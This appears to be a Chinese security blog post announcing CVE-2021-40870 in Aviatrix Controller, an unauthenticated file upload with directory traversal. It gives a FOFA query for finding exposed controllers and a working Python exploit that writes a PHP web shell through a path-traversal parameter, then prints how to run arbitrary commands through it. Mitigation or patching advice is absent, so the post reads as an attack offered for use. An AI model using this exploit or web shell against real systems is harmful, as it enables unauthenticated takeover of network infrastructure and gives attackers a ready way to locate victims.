新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell

洞悉安全,风洞网,认准官方网站!
风洞网


FOFA语法:app="Aviatrix-Controller"
风洞网
CVE-2021-40870 漏洞利用

在 6.5-1804.1922 之前的 Aviatrix Controller 6.x 中发现了一个问题。可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。

POC

def poc_attack(url):
    try:
        url = url + "/"
 
        filename = "RCE.php"
        shell = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>'''
        if url.startswith('https://'):
            k = url.replace("https://", "")
            if k.endswith("/"):
                p = k.replace("/", "")
 
        user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'''
 
        headers = {
            "Host": p,
            "User-Agent": user,
            "Connection": "close",
            "Content-Length": "109",
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept-Encoding": "gzip",
        }
 
        body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}'
 
        r = requests.post(url + '/v1/backend1', headers=headers, data=body, verify=False)
        check_file = requests.get(url + '/v1/' + filename, verify=False)
        if check_file.status_code == 200:
            print(f'EXPLOITED {url}')
            print('')
            print(f'Go To {url}/v1/{filename}')
            print('')
            print('access shell using RCE.php?cmd=[command]')
    except Exception as err:
        pass

原POC利用Github公布地址:https://github.com/0xAgun/CVE-2021-40870

关注风洞网微信公众号!

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值